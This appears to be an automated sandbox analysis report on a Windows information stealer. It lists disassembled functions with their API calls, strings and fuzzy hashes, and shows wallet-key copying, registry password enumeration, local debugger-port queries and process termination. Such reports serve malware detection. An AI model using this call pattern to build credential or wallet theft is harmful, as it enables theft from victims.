                                          • Part of subcall function 0097A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00974F3E,00000000,00000000), ref: 0097A27A
                                          • Part of subcall function 0097A210: LocalFree.KERNEL32(?,?,?,?,00974F3E,00000000,?), ref: 0097A28F
                                        • lstrcat.KERNEL32(?,00000000), ref: 009846F3
                                        • StrCmpCA.SHLWAPI(?,009908D2), ref: 00984710
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00984722
                                        • lstrcat.KERNEL32(00000000,?), ref: 00984735
                                        • lstrcat.KERNEL32(00000000,00990FA0), ref: 00984744
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                        • String ID:
                                        • API String ID: 3541710228-0
                                        • Opcode ID: 888fe9ff0929868eb69e79caba7fcef0a859782d1f94b7fe37601ef22c07dcb4
                                        • Instruction ID: 086887f71bebbfd83a77ad20109c3d9415af524d5db88dc2874f354c9a9d5337
                                        • Opcode Fuzzy Hash: 888fe9ff0929868eb69e79caba7fcef0a859782d1f94b7fe37601ef22c07dcb4
                                        • Instruction Fuzzy Hash: B87142B6900208ABDB14FBA4DD96FEE737DAFC9300F008598B60997181EB75DB44CB61
                                        Function 00971310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 009712A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009712B4
                                          • Part of subcall function 009712A0: RtlAllocateHeap.NTDLL(00000000), ref: 009712BB
                                          • Part of subcall function 009712A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009712D7
                                          • Part of subcall function 009712A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009712F5
                                          • Part of subcall function 009712A0: RegCloseKey.ADVAPI32(?), ref: 009712FF
                                        • lstrcat.KERNEL32(?,00000000), ref: 0097134F
                                        • lstrlen.KERNEL32(?), ref: 0097135C
                                        • lstrcat.KERNEL32(?,.keys), ref: 00971377
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                          • Part of subcall function 00988CF0: GetSystemTime.KERNEL32(00990E1B,0181EC50,009905B6,?,?,009713F9,?,0000001A,00990E1B,00000000,?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 00988D16
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00971465
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                          • Part of subcall function 0097A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0097A13C
                                          • Part of subcall function 0097A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0097A161
                                          • Part of subcall function 0097A110: LocalAlloc.KERNEL32(00000040,?), ref: 0097A181
                                          • Part of subcall function 0097A110: ReadFile.KERNEL32(000000FF,?,00000000,0097148F,00000000), ref: 0097A1AA
                                          • Part of subcall function 0097A110: LocalFree.KERNEL32(0097148F), ref: 0097A1E0
                                          • Part of subcall function 0097A110: CloseHandle.KERNEL32(000000FF), ref: 0097A1EA
                                        • DeleteFileA.KERNEL32(00000000), ref: 009714EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                        • API String ID: 3478931302-218353709
                                        • Opcode ID: 9df73fc9ab4837439861beee07bf9b1a9374adb90236da5ed7abac295ad6392e
                                        • Instruction ID: bbc05c17d7dab1a45579e1050880ee064ede1620896c7947adfb62dc0234d237
                                        • Opcode Fuzzy Hash: 9df73fc9ab4837439861beee07bf9b1a9374adb90236da5ed7abac295ad6392e
                                        • Instruction Fuzzy Hash: 305174B2D501189BDB15FB60DC92FED733CAB90300F4045D9B60A62192EF345B89CB66
                                        Function 00979A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenA.WININET(00990AF6,00000001,00000000,00000000,00000000), ref: 00979A6A
                                        • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00979AAB
                                        • InternetCloseHandle.WININET(00000000), ref: 00979AC7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$Open$CloseHandle
                                        • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                        • API String ID: 3289985339-2144369209
                                        • Opcode ID: b1e145bedb184d215a07ac06b3f94612e383314ec08eb803347c51b868a0557f
                                        • Instruction ID: 435a3bb20a37a8701dd1d8dd483b9846338bbf33371956d4822fa62bcb325b26
                                        • Opcode Fuzzy Hash: b1e145bedb184d215a07ac06b3f94612e383314ec08eb803347c51b868a0557f
                                        • Instruction Fuzzy Hash: DE411936A50218AFDB14EF94DC95FDD7778FB88740F108198F559AA290CBB0AE84CB60
                                        Function 00977630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00977330: memset.MSVCRT ref: 00977374
                                          • Part of subcall function 00977330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0097739A
                                          • Part of subcall function 00977330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00977411
                                          • Part of subcall function 00977330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0097746D
                                          • Part of subcall function 00977330: GetProcessHeap.KERNEL32(00000000,?), ref: 009774B2
                                          • Part of subcall function 00977330: HeapFree.KERNEL32(00000000), ref: 009774B9
                                        • lstrcat.KERNEL32(00000000,0099192C), ref: 00977666
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 009776A8
                                        • lstrcat.KERNEL32(00000000, : ), ref: 009776BA
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 009776EF
                                        • lstrcat.KERNEL32(00000000,00991934), ref: 00977700
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00977733
                                        • lstrcat.KERNEL32(00000000,00991938), ref: 0097774D
                                        • task.LIBCPMTD ref: 0097775B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                        • String ID: :
                                        • API String ID: 3191641157-3653984579
                                        • Opcode ID: 89774b7fef50d935653670a74096bd62ff686f7a0f76ded9286a481b630d4694
                                        • Instruction ID: 29854f9a1c06d5fe112546415328992a76ca1394c06f6a6cc3cb2b2113d890c7
                                        • Opcode Fuzzy Hash: 89774b7fef50d935653670a74096bd62ff686f7a0f76ded9286a481b630d4694
                                        • Instruction Fuzzy Hash: D6314F76D08105EBDB18EBE4DC96FFF7379BB85301B508218F106672A0DB34A946CB61
                                        Function 00977330 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00977374
                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0097739A
                                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00977411
                                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0097746D
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 009774B2
                                        • HeapFree.KERNEL32(00000000), ref: 009774B9
                                        • task.LIBCPMTD ref: 009775B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                        • String ID: Password
                                        • API String ID: 2808661185-3434357891
                                        • Opcode ID: 1971b12eb50871bfea0fb6713388ddd2da31e5f8d31a6bdb8a87bc7e7cef1773
                                        • Instruction ID: e59bc155ece299b7b49da3e76738ed098c360ea6038294a2b6d4d5f9a829ceeb
                                        • Opcode Fuzzy Hash: 1971b12eb50871bfea0fb6713388ddd2da31e5f8d31a6bdb8a87bc7e7cef1773
                                        • Instruction Fuzzy Hash: 7C611CB69441689BDB24DB50CC55BDAB7B8BF84304F00C5E9E64DA6141EFB06BC9CF90
                                        Function 00988290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0181F320,00000000,?,00990E14,00000000,?,00000000), ref: 009882C0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 009882C7
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 009882E8
                                        • __aulldiv.LIBCMT ref: 00988302
                                        • __aulldiv.LIBCMT ref: 00988310
                                        • wsprintfA.USER32 ref: 0098833C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                        • String ID: %d MB$@
                                        • API String ID: 2774356765-3474575989
                                        • Opcode ID: 23ce0d09d551edca69b076c4f2139135efec432d934697016330d101c522083b
                                        • Instruction ID: e2d85f7ad3296a61bf8f577906cbda7b357a55d2d35d1f30a4e810fa5557a115
                                        • Opcode Fuzzy Hash: 23ce0d09d551edca69b076c4f2139135efec432d934697016330d101c522083b
                                        • Instruction Fuzzy Hash: 1A2138B1E44208ABDB10EFD4CC49FAEB7B8FB44B04F104609F215BB2C0D7B859008BA4
                                        Function 00979E30 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 163stringsleepCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00988CF0: GetSystemTime.KERNEL32(00990E1B,0181EC50,009905B6,?,?,009713F9,?,0000001A,00990E1B,00000000,?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 00988D16
                                        • wsprintfA.USER32 ref: 00979E7F
                                        • memset.MSVCRT ref: 00979EED
                                        • lstrcat.KERNEL32(00000000,?), ref: 00979F03
                                        • lstrcat.KERNEL32(00000000,?), ref: 00979F17
                                        • lstrcat.KERNEL32(00000000,009912D8), ref: 00979F29
                                        • lstrcpy.KERNEL32(?,00000000), ref: 00979F7C
                                        • memset.MSVCRT ref: 00979F9C
                                        • Sleep.KERNEL32(00001388), ref: 0097A013
                                          • Part of subcall function 009899A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009899C5
                                          • Part of subcall function 009899A0: Process32First.KERNEL32(0097A056,00000128), ref: 009899D9
                                          • Part of subcall function 009899A0: Process32Next.KERNEL32(0097A056,00000128), ref: 009899F2
                                          • Part of subcall function 009899A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00989A4E
                                          • Part of subcall function 009899A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00989A6C
                                          • Part of subcall function 009899A0: CloseHandle.KERNEL32(00000000), ref: 00989A79
                                          • Part of subcall function 009899A0: CloseHandle.KERNEL32(0097A056), ref: 00989A88
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseHandleProcessProcess32memset$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                        • String ID: D
                                        • API String ID: 3242155833-2746444292
                                        • Opcode ID: 85fe0e651f24082420265e0d58bf6bbeee68bf7a543f0dd49746fc0602395113
                                        • Instruction ID: 9a12d7e17ee026baf6c4a581e916ad344f63200387c1cb7dddacde00e6d6d4c9
                                        • Opcode Fuzzy Hash: 85fe0e651f24082420265e0d58bf6bbeee68bf7a543f0dd49746fc0602395113
                                        • Instruction Fuzzy Hash: 705174B5944318ABEB24EB60DC4AFDE7378BB84700F044598B60DAB2D1EB759B84CF51
                                        Function 009760F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                          • Part of subcall function 00974800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00974889
                                          • Part of subcall function 00974800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00974899
                                        • InternetOpenA.WININET(00990DFB,00000001,00000000,00000000,00000000), ref: 0097615F
                                        • StrCmpCA.SHLWAPI(?,0181FCB0), ref: 00976197
                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 009761DF
                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00976203
                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 0097622C
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0097625A
                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00976299
                                        • InternetCloseHandle.WININET(?), ref: 009762A3
                                        • InternetCloseHandle.WININET(00000000), ref: 009762B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2507841554-0
                                        • Opcode ID: 27ac6456bcf28ac59224dd14e45405303453368241ebd8254ac8b064b42d4240
                                        • Instruction ID: 1a881894c09724b51b5b0bdbb299a033eb83fce98f411ad41b82f1ee9cd63fc4
                                        • Opcode Fuzzy Hash: 27ac6456bcf28ac59224dd14e45405303453368241ebd8254ac8b064b42d4240
                                        • Instruction Fuzzy Hash: 615161B1A00618AFEF20DF90DC49BEE7779BB44301F108599F609A71C1DB74AA89CF95
                                        Function 009F012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • type_info::operator==.LIBVCRUNTIME ref: 009F024D
                                        • ___TypeMatch.LIBVCRUNTIME ref: 009F035B
